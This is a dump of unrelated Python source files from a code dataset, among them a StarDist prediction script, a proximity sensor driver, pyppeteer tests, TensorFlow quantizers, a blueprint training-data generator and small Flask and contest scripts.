argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=\"\"\"\nPrediction script for a 3D stardist model, usage: stardist-predict -i input.tif -m model_folder_or_pretrained_name -o output_folder\n\n\"\"\")\n parser.add_argument(\"-i\",\"--input\", type=str, nargs=\"+\", required=True, help = \"input file (tiff)\")\n parser.add_argument(\"-o\",\"--outdir\", type=str, default='.', help = \"output directory\")\n parser.add_argument(\"--outname\", type=str, nargs=\"+\", default='{img}.stardist.tif', help = \"output file name (tiff)\")\n\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('-m', '--model', type=str, default=None, help = \"model folder / pretrained model to use\")\n parser.add_argument(\"--axes\", type=str, default = None, help = \"axes to use for the input, e.g. 'XYC'\")\n parser.add_argument(\"--n_tiles\", type=int, nargs=3, default = None, help = \"number of tiles to use for prediction\")\n parser.add_argument(\"--pnorm\", type=float, nargs=2, default = [1,99.8], help = \"pmin/pmax to use for normalization\")\n parser.add_argument(\"--prob_thresh\", type=float, default=None, help = \"prob_thresh for model (if not given use model default)\")\n parser.add_argument(\"--nms_thresh\", type=float, default=None, help = \"nms_thresh for model (if not given use model default)\")\n \n parser.add_argument(\"-v\", \"--verbose\", action='store_true')\n \n args = parser.parse_args()\n\n\n from csbdeep.utils import normalize\n from csbdeep.models.base_model import get_registered_models\n from stardist.models import StarDist3D\n from tifffile import imwrite, imread\n\n get_registered_models(StarDist3D, verbose=True)\n\n if pathlib.Path(args.model).is_dir():\n model = StarDist3D(None, name=args.model)\n else:\n model = StarDist3D.from_pretrained(args.model)\n\n if model is None:\n raise ValueError(f\"unknown model: {args.model}\\navailable models:\\n {get_registered_models(StarDist2D, verbose=True)}\")\n \n for fname in args.input:\n if args.verbose:\n print(f'reading image {fname}')\n\n if not pathlib.Path(fname).suffix.lower() in (\".tif\", \".tiff\"):\n raise ValueError('only tiff files supported in 3D for now')\n\n img = imread(fname)\n\n\n if not img.ndim in (3,4):\n raise ValueError(f'currently only 3d (or 4D with channel) images are supported by the prediction script')\n\n if args.axes is None:\n args.axes = {3:'ZYX',4:'ZYXC'}[img.ndim]\n \n if len(args.axes) != img.ndim:\n raise ValueError(f'dimension of input ({img.ndim}) not the same as length of given axes ({len(args.axes)})')\n\n if args.verbose:\n print(f'loaded image of size {img.shape}')\n\n if args.verbose:\n print(f'normalizing...')\n \n img = normalize(img,*args.pnorm)\n\n labels, _ = model.predict_instances(img,\n n_tiles=args.n_tiles,\n prob_thresh=args.prob_thresh,\n nms_thresh=args.nms_thresh)\n out = pathlib.Path(args.outdir)\n out.mkdir(parents=True,exist_ok=True)\n\n imwrite(out/args.outname.format(img=pathlib.Path(fname).with_suffix('').name), labels)\n \n\nif __name__ == '__main__':\n main()\n","sub_path":"stardist/scripts/predict3d.py","file_name":"predict3d.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"28874005","text":"\"\"\"\nVCNL4010 PROXIMITY SENSOR LIBRARY\n\nWORKING VERSION\n\nDESCRIPTION\n Current working version of proximity sensor code with custom read and write methods\n\nISSUES\n Output range is 2000 - 15000 instead of 0 - 65000\n Read method\n Original read method uses buffer to \"write then read into\" instead of just read from the register\n 16 bit conversion\n Not sure if the method I'm using is actually reading into 16 bit high and low bytes\n\nQUESTIONS\n Do I have to use a buffer?\n Why is the original method writing and then reading from the buffer immediately?\n How can I better replicate the original library with my code?\n Is the read and write from the SMBus library comparable to the read and write from the CircuitPython library?\n Also questions around conversion from high and low byte to 16 bit data?\n Seems like all the outputs I'm getting are in decimal values?\n Is it worth reading from one register (8 bit) then the other, combining into a string then reading then entire\n value as a 16 bit byte?\n\nAPPROACHES - what have I tried that hasn't worked\n Using CircuitPython based libraries\n Need to have a board that is custom built for their application\n\n Recreating the \"write_read\" method within the source code with my methods from SMBus\n Unclear how they write into the buffer, where the buffer is located, how they read from the buffer\n Note that my current version does not use a buffer\n\n\n\"\"\"\n\nfrom micropython import const\nimport adafruit_bus_device.i2c_device as i2c_device\nfrom smbus2 import SMBus\n\n__version__ = \"0.0.0-auto.0\"\n\n# pylint: disable=bad-whitespace\n# Internal constants:\n_VCNL4010_I2CADDR_DEFAULT = const(0x13)\n_VCNL4010_COMMAND = const(0x80)\n_VCNL4010_PRODUCTID = const(0x81)\n_VCNL4010_PROXRATE = const(0x82)\n_VCNL4010_IRLED = const(0x83)\n_VCNL4010_AMBIENTPARAMETER = const(0x84)\n_VCNL4010_AMBIENTDATA = const(0x85)\n_VCNL4010_PROXIMITYDATA = const(0x87)\n_VCNL4010_INTCONTROL = const(0x89)\n_VCNL4010_PROXINITYADJUST = const(0x8A)\n_VCNL4010_INTSTAT = const(0x8E)\n_VCNL4010_MODTIMING = const(0x8F)\n_VCNL4010_MEASUREAMBIENT = const(0x10)\n_VCNL4010_MEASUREPROXIMITY = const(0x08)\n_VCNL4010_AMBIENTREADY = const(0x40)\n_VCNL4010_PROXIMITYREADY = const(0x20)\n_VCNL4010_AMBIENT_LUX_SCALE = 0.25 # Lux value per 16-bit result value.\n\n# User-facing constants:\nFREQUENCY_3M125 = 3\nFREQUENCY_1M5625 = 2\nFREQUENCY_781K25 = 1\nFREQUENCY_390K625 = 0\n\n# Disable pylint's name warning as it causes too much noise. Suffixes like\n# BE (big-endian) or mA (milli-amps) don't confirm to its conventions--by\n# design (clarity of code and explicit units). Disable this globally to prevent\n# littering the code with pylint disable and enable and making it less readable.\n# pylint: disable=invalid-name\n\nclass VCNL4010:\n \"\"\"Vishay VCNL4010 proximity and ambient light sensor.\"\"\"\n\n def __init__(self):\n self._device = SMBus(1)\n self.led_current = 20\n self.frequency = FREQUENCY_390K625\n self._write_u8(_VCNL4010_INTCONTROL, 0x08)\n\n def _read_u8(self, address):\n # Read an 8-bit unsigned value from the specified 8-bit address.\n with SMBus(1) as self._device:\n read = self._device.read_byte_data(_VCNL4010_I2CADDR_DEFAULT, address)\n return read\n\n def _write_u8(self, address, val):\n # Write an 8-bit unsigned value to the specified 8-bit address.\n with SMBus(1) as self._device:\n self._device.write_byte_data(_VCNL4010_I2CADDR_DEFAULT, address, val)\n\n def _read_u16BE(self, address):\n with SMBus(1) as self._device:\n read_block = self._device.read_i2c_block_data(_VCNL4010_I2CADDR_DEFAULT, address, 2)\n return (read_block[0] << 8) | read_block[1]\n\n @property\n def proximity(self):\n \"\"\"The detected proximity of an object in front of the sensor. This\n is a unit-less unsigned 16-bit value (0-65535) INVERSELY proportional\n to the distance of an object in front of the sensor (up to a max of\n ~200mm). For example a value of 10 is an object farther away than a\n value of 1000. Note there is no conversion from this value to absolute\n distance possible, you can only make relative comparisons.\n \"\"\"\n # Clear interrupt.\n status = self._read_u8(_VCNL4010_INTSTAT)\n status &= ~0x80\n self._write_u8(_VCNL4010_INTSTAT, status)\n # Grab a proximity measurement.\n self._write_u8(_VCNL4010_COMMAND, _VCNL4010_MEASUREPROXIMITY)\n # Wait for result, then read and return the 16-bit value.\n while True:\n result = self._read_u8(_VCNL4010_COMMAND)\n if result & _VCNL4010_PROXIMITYREADY:\n return self._read_u16BE(_VCNL4010_PROXIMITYDATA)\n","sub_path":"Archive/Proximity_Sensor.py","file_name":"Proximity_Sensor.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"548238995","text":"from Mapping.StockMarketFeaturesMapping import StockMarketFeaturesMapping\nimport time\nfrom multiprocessing import Pool\n\nCON = [\n {\n 'sourceStockTechIndiTableName': 'DERI_STOCK_TECH_INDICATORS',\n 'sourceCategoryTableName': 'STOCK_DESCRIPTION',\n 'codeField': 'code',\n 'dateField': 'date',\n 'categoryField': 'area',\n 'retSeriesField': ['RET'],\n 'lags': [1, 2, 5, 10, 20, 30, 60],\n 'targetTableName': 'DERI_AREA_RISE_RATIO',\n 'chunkSize': 10\n },\n {\n 'sourceStockTechIndiTableName': 'DERI_STOCK_TECH_INDICATORS',\n 'sourceCategoryTableName': 'STOCK_INDUSTRY',\n 'codeField': 'code',\n 'dateField': 'date',\n 'categoryField': 'industry',\n 'retSeriesField': ['RET'],\n 'lags': [1, 2, 5, 10, 20, 30, 60],\n 'targetTableName': 'DERI_INDUSTRY_RISE_RATIO',\n 'chunkSize': 10\n },\n {\n 'sourceStockTechIndiTableName': 'DERI_STOCK_TECH_INDICATORS',\n 'sourceCategoryTableName': '',\n 'codeField': 'code',\n 'dateField': 'date',\n 'categoryField': 'market',\n 'retSeriesField': ['RET'],\n 'lags': [1, 2, 5, 10, 20, 30, 60],\n 'targetTableName': 'DERI_MARKET_RISE_RATIO',\n 'chunkSize': 10\n },\n {\n 'sourceStockTechIndiTableName': 'DERI_STOCK_TECH_INDICATORS',\n 'sourceCategoryTableName': '',\n 'codeField': 'code',\n 'dateField': 'date',\n 'categoryField': 'all',\n 'retSeriesField': ['RET'],\n 'lags': [1, 2, 5, 10, 20, 30, 60],\n 'targetTableName': 'DERI_ALL_STOCK_RISE_RATIO',\n 'chunkSize': 10\n }\n]\n\ndef airflowCallableArea():\n con = CON[0]\n features = StockMarketFeaturesMapping(**con)\n features.run()\n\ndef airflowCallableIndustry():\n con = CON[1]\n features = StockMarketFeaturesMapping(**con)\n features.run()\n\ndef airflowCallableMarket():\n con = CON[2]\n features = StockMarketFeaturesMapping(**con)\n features.run()\n\ndef airflowCallableAllStock():\n con = CON[3]\n features = StockMarketFeaturesMapping(**con)\n features.run()\n\n\nif __name__ == '__main__':\n start_time = time.clock()\n # airflowCallableAllStock()\n # pool = Pool(processes=4)\n # tot_res = []\n for i in CON:\n features = StockMarketFeaturesMapping(**i)\n features.run()\n # res = pool.apply_async(features.run)\n # tot_res.append(res)\n\n # for (i, res) in enumerate(tot_res):\n # res.get()\n\n eclapsed = time.clock() - start_time\n print(\"Time eclapsed\", eclapsed)","sub_path":"Derivatives/calStockMarketFeatures.py","file_name":"calStockMarketFeatures.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"617236661","text":"import pytest\nfrom syncer import sync\n\nfrom pyppeteer.errors import NetworkError\nfrom tests.conftest import CHROME\n\n\n@sync\nasync def test_handle(isolated_page, server):\n \"\"\"test getting handle\"\"\"\n p = isolated_page\n assert await p.evaluateHandle('window')\n\n\n@sync\nasync def test_handle_with_arg(isolated_page, server):\n \"\"\"test getting handle\"\"\"\n p = isolated_page\n navigatorHandle = await p.evaluateHandle(\"navigator\")\n text = await p.evaluate('e => e.userAgent', navigatorHandle)\n assert 'Mozilla' in text\n\n\n@sync\nasync def test_handle_primitive_types(isolated_page, server):\n \"\"\"test getting handle\"\"\"\n p = isolated_page\n handle = await p.evaluateHandle('5')\n assert p.evaluate('e => Object.is(e, 5)', handle)\n\n\n@sync\nasync def test_warn_nested_handles(isolated_page, server):\n p = isolated_page\n handle = await p.evaluateHandle('document.body')\n await p.evaluateHandle(\n \"opts => opts.elem.querySelector('p')\",\n handle, # todo translate {elem: handle} right now this hangs\n )\n\n\n@sync\nasync def test_handle_unserializable(isolated_page, server):\n p = isolated_page\n handle = await p.evaluateHandle('Infinity')\n assert await p.evaluate('e => Object.is(e, Infinity)', handle) is True\n\n\n@sync\nasync def test_js_wrappers(isolated_page, server):\n p = isolated_page\n handle = await p.evaluateHandle(\"\"\"\n () => {\n window.Foo = 123;\n return window; \n }\n \"\"\".strip())\n assert await p.evaluate('e => e.Foo', handle) == 123\n\n\n@sync\nasync def test_with_primitives(isolated_page, server):\n p = isolated_page\n handle = await p.evaluateHandle(\"\"\"\n () => {\n window.Foo = 123;\n return window; \n }\n \"\"\".strip())\n assert await p.evaluate('e => e.Foo', handle) == 123\n\n\n@sync\nasync def test_getProperty(isolated_page, server):\n p = isolated_page\n handle = await p.evaluateHandle(\"\"\"\n () => ({\n one: 1,\n two: 2,\n three: 3\n })\n \"\"\".strip())\n handle2 = await handle.getProperty('two')\n assert await handle2.jsonValue() == 2\n\n\n@sync\nasync def test_jsonValue(isolated_page, server):\n # should work with json values\n p = isolated_page\n handle = await p.evaluateHandle('() => ({foo: \"bar\"})')\n assert await handle.jsonValue() == {'foo': 'bar'}\n\n # should not work with dates\n handle_date = await p.evaluateHandle(\n \"new Date('2017-09-26T00:00:00.000Z')\"\n )\n assert await handle_date.jsonValue() == {}\n\n # should throw for circular objects like windows\n handle_window = await p.evaluateHandle('window')\n with pytest.raises(NetworkError) as e:\n await handle_window.jsonValue()\n if CHROME:\n assert e.match('Object reference chain is too long')\n else:\n assert e.match('Object is not serial')\n\n\n@sync\nasync def test_getProperties(isolated_page, server):\n p = isolated_page\n handle = await p.evaluateHandle('({foo: \"bar\"})')\n properties = await handle.getProperties()\n foo = properties.get('foo')\n assert foo\n assert await foo.jsonValue() == 'bar'\n\n # should return even non-own properties\n handle = await p.evaluateHandle(\n \"\"\"\n () => {\n class A {\n constructor() {\n this.a = '1';\n }\n }\n\n class B extends A {\n constructor() {\n super();\n this.b = '2';\n }\n }\n\n return new B()\n }\n \"\"\")\n properties = await handle.getProperties()\n assert await properties.get('a').jsonValue() == '1'\n assert await properties.get('b').jsonValue() == '2'\n\n\n@sync\nasync def test_asElement(isolated_page, server):\n p = isolated_page\n # should work\n handle = await p.evaluateHandle(\"document.body\")\n assert handle.asElement()\n\n # should return None for non-elements\n handle = await p.evaluateHandle(\"2\")\n element = handle.asElement()\n assert element is None\n\n # should return ElementHandle for TextNodes\n await p.setContent('<div>ee!</div>')\n handle = await p.evaluateHandle(\n \"document.querySelector('div').firstChild\"\n )\n element = handle.asElement()\n assert element\n assert await p.evaluate(\n 'e => e.nodeType === HTMLElement.TEXT_NODE',\n element\n )\n\n\n # should work with nulified None\n await p.setContent('<section>test</section>')\n await p.evaluate('delete Node')\n handle = await p.evaluateHandle(\n 'document.querySelector(\"section\")'\n )\n assert handle.asElement()\n\n\n@sync\nasync def test_toString(isolated_page, server):\n p = isolated_page\n input_to_expected = {\n # should work for primitives\n '2': 'JSHandle:2',\n '\"a\"': 'JSHandle:a',\n # should work for complicated objects\n 'window': 'JSHandle@object',\n # should work with different subtypes\n '(function(){})': 'JSHandle@function',\n '12': 'JSHandle:12',\n 'true': 'JSHandle:True',\n 'undefined': 'JSHandle:None',\n '\"foo\"': 'JSHandle:foo',\n 'Symbol()': 'JSHandle@symbol',\n 'new Set()': 'JSHandle@set',\n 'new Map()': 'JSHandle@map',\n '[]': 'JSHandle@array',\n 'null': 'JSHandle:None',\n '/foo/': 'JSHandle@regexp',\n 'document.body': 'JSHandle@node',\n 'new Date()': 'JSHandle@date',\n 'new WeakMap()': 'JSHandle@weakmap',\n 'new Error()': 'JSHandle@error',\n 'new Int32Array()': 'JSHandle@typedarray',\n 'new Proxy({}, {})': 'JSHandle@proxy',\n\n }\n for value, expected in input_to_expected.items():\n handle = await p.evaluateHandle(value)\n assert handle.toString() == expected\n","sub_path":"tests/test_jshandle.py","file_name":"test_jshandle.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"58102281","text":"import copy\nimport random\nfrom typing import Tuple, Generator, Dict\nimport numpy as np\n\nfrom Blueprint.Blueprint import Blueprint\nfrom Blueprint.BlueprintWrapper import BlueprintWrapper\nfrom Blueprint.Entity import Entity\nfrom Blueprint.Exceptions.UnknownEntityException import UnknownEntityException\nfrom Grid import Grid\nfrom data import iter_stored_blueprints\n\n\n# TODO remove\nnp.set_printoptions(edgeitems=1000, linewidth=1000)\n\n\nclass TrainGenerator:\n def __init__(self, minimum_entity_count: int = 3, train_omission_portion: float = 0.1, seed: int = None, verbose: bool = False):\n self.chunk_size: int = 32\n self.step_size: int = 16\n self.minimum_entity_count: int = minimum_entity_count\n\n if not 0 < train_omission_portion < 1.:\n raise Exception(\"train_omission_portion should be between 0 and 1\")\n self.train_omission_portion: float = train_omission_portion\n self.seed: int = seed\n random.seed = self.seed\n self.verbose: bool = verbose\n\n self.entity_index_map, self.reverse_entity_index_map = self._get_entity_index_dicts()\n self._e_lookup = np.vectorize(TrainGenerator._lookup_entity_index, otypes=[int, bool])\n self._re_lookup = np.vectorize(TrainGenerator._reverse_lookup_entity_index, otypes=[str])\n\n\n def _validate_entity_array(self, entity_array: np.array) -> bool:\n # TODO check number of entities?\n return True\n\n @staticmethod\n def _get_entity_index_dicts() -> Tuple[dict, dict]:\n entity_index_map = {}\n reverse_index_map = {}\n\n index = 0\n for k in Entity.get_entity_size_dict().keys():\n if not str(k).endswith(\"remnants\"):\n entity_index_map[str(k)] = index\n reverse_index_map[index] = str(k)\n index += 1\n\n return entity_index_map, reverse_index_map\n\n @staticmethod\n def _lookup_entity_index(e: Entity, entity_index_map: Dict[str, int]):\n if e is None or e.name not in entity_index_map:\n return -1, False\n return entity_index_map[e.name], True\n\n @staticmethod\n def _reverse_lookup_entity_index(index: int, reverse_entity_index_map: Dict[int, str]):\n if index not in reverse_entity_index_map:\n return None\n return reverse_entity_index_map[index]\n\n def one_hot_encode_grid(self, entity_array: np.array) -> np.array:\n (h, w) = entity_array.shape\n one_hot_grid = np.zeros((h, w, len(self.entity_index_map)), dtype=int)\n\n for i in range(h):\n for j in range(w):\n entity: Entity = entity_array[i][j]\n if entity is None:\n continue\n\n one_hot_grid[i][j][self.entity_index_map[entity.name]] = 1\n return one_hot_grid\n\n def one_hot_decode_grid(self, one_hot_grid: np.array) -> np.array:\n # if all zero set the value of the cell to -1 else set to the argmax (index of max value)\n amax = np.where(np.count_nonzero(one_hot_grid, axis=-1) == 0,\n -1,\n np.argmax(one_hot_grid, axis=-1))\n return self._re_lookup(amax, self.reverse_entity_index_map)\n\n @staticmethod\n def _tile_numpy(grid_array: np.array, size: Tuple[int, int], border: int = 1) -> np.array:\n a = np.zeros((grid_array.shape[0] + border,\n grid_array.shape[1] + border,\n grid_array.shape[2]))\n a[: grid_array.shape[0], :grid_array.shape[1], :grid_array.shape[2]] = grid_array\n\n xn = int(np.ceil(size[1] / a.shape[1]))\n yn = int(np.ceil(size[0] / a.shape[0]))\n\n a = np.tile(a, [yn, xn, 1])\n return a[:size[0], :size[1]]\n\n def iter_grid_chunks(self, img: np.array) -> Generator[np.array, None, None]:\n if self.chunk_size % self.step_size != 0 or self.step_size > self.chunk_size:\n # Ensure size is a multiple of the step size\n raise Exception(\"Chunk size should be a larger multiple of step size in both dimensions\")\n\n size = (int(np.ceil(img.shape[0] / self.step_size)) * self.step_size,\n int(np.ceil(img.shape[1] / self.step_size)) * self.step_size)\n\n tiled_img = self._tile_numpy(img, size)\n\n xs = np.arange(0, tiled_img.shape[1] - self.step_size, self.step_size)\n ys = np.arange(0, tiled_img.shape[0] - self.step_size, self.step_size)\n for x in xs:\n for y in ys:\n yield tiled_img[y: y + self.chunk_size, x: x + self.chunk_size]\n\n def iter_individual_blueprints(self) -> Generator[Blueprint, None, None]:\n for k, bpDict in iter_stored_blueprints(self.seed):\n try:\n wrapper = BlueprintWrapper(**bpDict)\n except KeyError as e:\n if self.verbose:\n print(e)\n continue\n except UnknownEntityException as e:\n if self.verbose:\n print(f\"Unknown entity in {k}: {e}\")\n continue\n except Exception:\n if self.verbose:\n print(f\"Error processing blueprint with key {k}.\")\n continue\n\n for bp in wrapper.iter_items():\n yield bp\n\n def iter_training_set(self) -> Generator[Tuple[np.array, np.array], None, None]:\n for bp in self.iter_individual_blueprints():\n omit_bp = copy.deepcopy(bp)\n omit_bp.entities = omit_bp.entities[int(self.train_omission_portion * len(bp.entities)):]\n\n grid = Grid(bp)\n self._validate_entity_array(grid.grid)\n\n omit_grid = Grid(omit_bp, grid.width, grid.height, grid.x_offset, grid.y_offset)\n\n one_hot = self.one_hot_encode_grid(grid.grid)\n omit_one_hot = self.one_hot_encode_grid(omit_grid.grid)\n for x, y in zip(self.iter_grid_chunks(omit_one_hot), self.iter_grid_chunks(one_hot)):\n s = np.sum(y)\n if s - s * self.train_omission_portion < self.minimum_entity_count:\n continue\n\n yield x, y\n\n\ndef main():\n import time\n\n gen = TrainGenerator(seed=None, verbose=True)\n\n t0 = time.time()\n for i, (x, y) in enumerate(gen.iter_training_set()):\n if i > 1000:\n break\n # print(gen.one_hot_decode_grid(x))\n t1 = time.time()\n print(t1 - t0)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"TrainGenerator.py","file_name":"TrainGenerator.py","file_ext":"py","file_size_in_byte":6425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"93017403","text":"\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ntheta_set = [20, 40, 60, 80]\n\ndef P_c1_d(d, theta):\n\n\t# calculate P(catch|d) = 1 − [ 1 / (1 + exp(− d− θ /15 )) ]\n\tdenom = 1 + math.exp( -1 * ( (d - theta)/15 ) )\n\tp_catch = 1.0 - (1 / denom)\n\treturn p_catch\n\ndef Up(s, action, level):\n\n\tif level >= 4:\n\t\treturn 0.0\n\n\tutilityOutput = 0.0\n\n\ttheta = s\n\tdistance = action\n\tRsa = action * P_c1_d(distance, theta)\n\n\tsp_summation = 0.0\n\tfor i in range(len(theta_set)):\n\t\t\n\t\tsp = theta_set[i]\n\n\t\tT = 1.0 if sp == s else 0.0\n\n\t\to_summation = 0.0\n\n\t\tfor o in range(2):\n\t\n\t\t\tP = P_c1_d(action, sp)\n\n\t\t\tif o == 1:\n\t\t\t\t# successful catch\n\t\t\t\tU_sub = Up(sp, action + 10, level + 1)\n\t\t\t\to_summation += P * U_sub\n\n\t\t\telse:\n\t\t\t\t# no catch\n\t\t\t\tU_sub = Up(sp, action - 10, level + 1)\n\t\t\t\to_summation += (1 - P) * U_sub\n\n\t\t\t\n\t\tsp_summation += T * o_summation\n\t\n\treturn Rsa + sp_summation\n\t\n\t\ndef get_alpha_vec():\n\n\tpossible_states_b = [20, 40, 60, 80]\n\talpha_vec = [0.0] * 4\n\troot_action = 50\n\n\tfor i in range(len(alpha_vec)):\n\t\t\n\t\ts = possible_states_b[i]\n\t\t\n\t\talpha_vec[i] = Up(s, root_action, 0)\n\n\treturn alpha_vec\n\n\nalpha_vec = get_alpha_vec() \nprint(\"alpha_vec: \", alpha_vec)\n","sub_path":"coursework/courseworkCode/cs238-decisionMakingUnderUncertainty/problems/q7.py","file_name":"q7.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"409452551","text":"import tensorflow as tf\nfrom ._nnimc_tf import TfQuantizer\nfrom ._nnimc_tf import _tf_default_get_configure, _tf_default_load_configure_file\n\nimport logging\nlogger = logging.getLogger('tensorflow quantizer')\n\nclass NaiveQuantizer(TfQuantizer):\n \"\"\"\n quantize weight to 8 bits\n \"\"\"\n def __init__(self):\n super().__init__()\n self.layer_scale = {}\n\n def quantize_weight(self, layer_info, weight):\n new_scale = tf.reduce_max(tf.abs(weight)) / 127\n scale = tf.maximum(self.layer_scale.get(layer_info.name, tf.constant(0.0)), new_scale)\n self.layer_scale[layer_info.name] = scale\n orig_type = weight.dtype\n return tf.cast(tf.cast(weight / scale, tf.int8), orig_type) * scale\n\nclass QATquantizer(TfQuantizer):\n \"\"\"\n Quantizer using the DoReFa scheme, as defined in:\n Quantization and Training of Neural Networks for Efficient Integer-Arithmetic-Only Inference\n http://openaccess.thecvf.com/content_cvpr_2018/papers/Jacob_Quantization_and_Training_CVPR_2018_paper.pdf\n \"\"\"\n def __init__(self, configure_list):\n \"\"\"\n Configure Args:\n q_bits\n \"\"\"\n super().__init__()\n self.configure_list = []\n if isinstance(configure_list, list):\n for configure in configure_list:\n self.configure_list.append(configure)\n else:\n raise ValueError('please init with configure list')\n \n \n def get_qbits(self, configure):\n if not isinstance(configure, dict):\n logger.warning('WARNING: you should input a dict to get_qbits, set DEFAULT { }')\n configure = {}\n qbits = configure.get('q_bits', 32)\n if qbits == 0:\n logger.warning('WARNING: you can not set q_bits ZERO!')\n qbits = 32\n return qbits\n\n def quantize_weight(self, layer_info, weight):\n q_bits = self.get_qbits(_tf_default_get_configure(self.configure_list, layer_info))\n\n a = tf.stop_gradient(tf.reduce_min(weight))\n b = tf.stop_gradient(tf.reduce_max(weight))\n n = tf.cast(2 ** q_bits, tf.float32)\n scale = b-a/(n-1)\n \n # use gradient_override_map to change round to idetity for gradient\n with tf.get_default_graph().gradient_override_map({'Round': 'Identity'}):\n qw = tf.round((weight-a)/scale)*scale +a\n \n return qw\n\nclass DoReFaQuantizer(TfQuantizer):\n \"\"\"\n Quantizer using the DoReFa scheme, as defined in:\n Zhou et al., DoReFa-Net: Training Low Bitwidth Convolutional Neural Networks with Low Bitwidth Gradients\n (https://arxiv.org/abs/1606.06160)\n \"\"\"\n def __init__(self, configure_list):\n \"\"\"\n Configure Args:\n q_bits\n \"\"\"\n super().__init__()\n self.configure_list = []\n if isinstance(configure_list, list):\n for configure in configure_list:\n self.configure_list.append(configure)\n else:\n raise ValueError('please init with configure list')\n\n \n def get_qbits(self, configure):\n if not isinstance(configure, dict):\n logger.warning('WARNING: you should input a dict to get_qbits, set DEFAULT { }')\n configure = {}\n qbits = configure.get('q_bits', 32)\n if qbits == 0:\n logger.warning('WARNING: you can not set q_bits ZERO!')\n qbits = 32\n return qbits\n\n def quantize_weight(self, layer_info, weight):\n q_bits = self.get_qbits(_tf_default_get_configure(self.configure_list, layer_info))\n a = tf.math.tanh(weight)\n b = a/(2*tf.reduce_max(tf.abs(weight))) + 0.5\n\n scale = pow(2, q_bits-1)\n # use gradient_override_map to change round to idetity for gradient\n with tf.get_default_graph().gradient_override_map({'Round': 'Identity'}):\n qw = tf.round(b*scale)/scale\n r_qw = 2*qw - 1\n return r_qw\n","sub_path":"src/sdk/pynni/nni/compressors/tf_compressor/quantizer.py","file_name":"quantizer.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"200342881","text":"import math\r\ndef binary(x):\r\n binaryx = \"\"\r\n if x==0:\r\n return \"0\"\r\n w=x\r\n y = (math.log(x, 2) // 1) + 1\r\n for p in range (int(y), h-1):\r\n binaryx = binaryx + \"0\"\r\n while y!=0:\r\n if w < 2**(y-1):\r\n binaryx = binaryx + \"0\"\r\n else:\r\n binaryx = binaryx + \"1\"\r\n w = w - (2**(y-1))\r\n y = y-1\r\n return binaryx\r\ndef split(c):\r\n data = list()\r\n finish = False\r\n d = -1\r\n e = 0\r\n while finish == False:\r\n d = d+1\r\n e = e+1\r\n if c[d] == \" \":\r\n data.append(c[d-e+1:d])\r\n c = c[:d] + \",\" + c[d:]\r\n d = d+1\r\n e = 0\r\n if d == len(c)-1:\r\n finish = True\r\n data.append(c[len(c)-e:])\r\n return data\r\nwith open(\"B-large2016R1C.in\") as z:\r\n a = z.readline()\r\n for b in range (0, int(a)):\r\n v = z.readline()\r\n f = split(v)\r\n for g in range (0,2):\r\n f[g] = int(f[g])\r\n special = False\r\n h = f[0]\r\n i = f[1]\r\n if i>2**(h-2):\r\n print(\"Case #\" + str(b+1) + \": \" + \"IMPOSSIBLE\")\r\n continue\r\n elif i == 2**(h-2):\r\n special = True\r\n print(\"Case #\" + str(b+1) + \": \" + \"POSSIBLE\")\r\n i = i-1\r\n else:\r\n print(\"Case #\" + str(b+1) + \": \" + \"POSSIBLE\")\r\n j = binary(i)\r\n j = list(j)\r\n if special == True:\r\n j.append(\"1\")\r\n else:\r\n j.append(\"0\")\r\n for k in range (0,h):\r\n answer = ''\r\n for l in range (0,k+1):\r\n answer = answer + \"0\"\r\n for m in range (k+1,h-1):\r\n answer = answer + \"1\"\r\n if k == h-1:\r\n answer = answer\r\n else:\r\n answer = answer + j[h-1-k]\r\n print(answer)\r\n\r\n\r\n \r\n","sub_path":"solutions_5744014401732608_1/Python/thefourseasons/B-small2016R1C.py","file_name":"B-small2016R1C.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"581744674","text":"from u2b import u2bsrt\nfrom flask import Flask, request, render_template, jsonify\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n \n@app.route('/langs', methods=['GET', 'POST'])\ndef langs():\n if request.method == 'GET':\n return \"list langs\"\n elif request.method == 'POST':\n video_url = request.form.get('video-url', '')\n langs = u2bsrt(video_url).get_langs()\n return jsonify(langs)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8080, debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"474370311","text":"from datetime import datetime, timedelta\nfrom threading import Timer\n\nx=datetime.today()\ny = x.replace(day=x.day, hour=8, minute=0, second=0, microsecond=0) + timedelta(days=1)\ndelta_t=y-x\n\nsecs=delta_t.total_seconds()\n\ndef main():\n\texec(open(\"getData.py\").read())\n\texec(open(\"postImg.py\").read())\n\n\nt = Timer(secs, main)\nt.start()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"230100222","text":"\"\"\"kh_site URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: 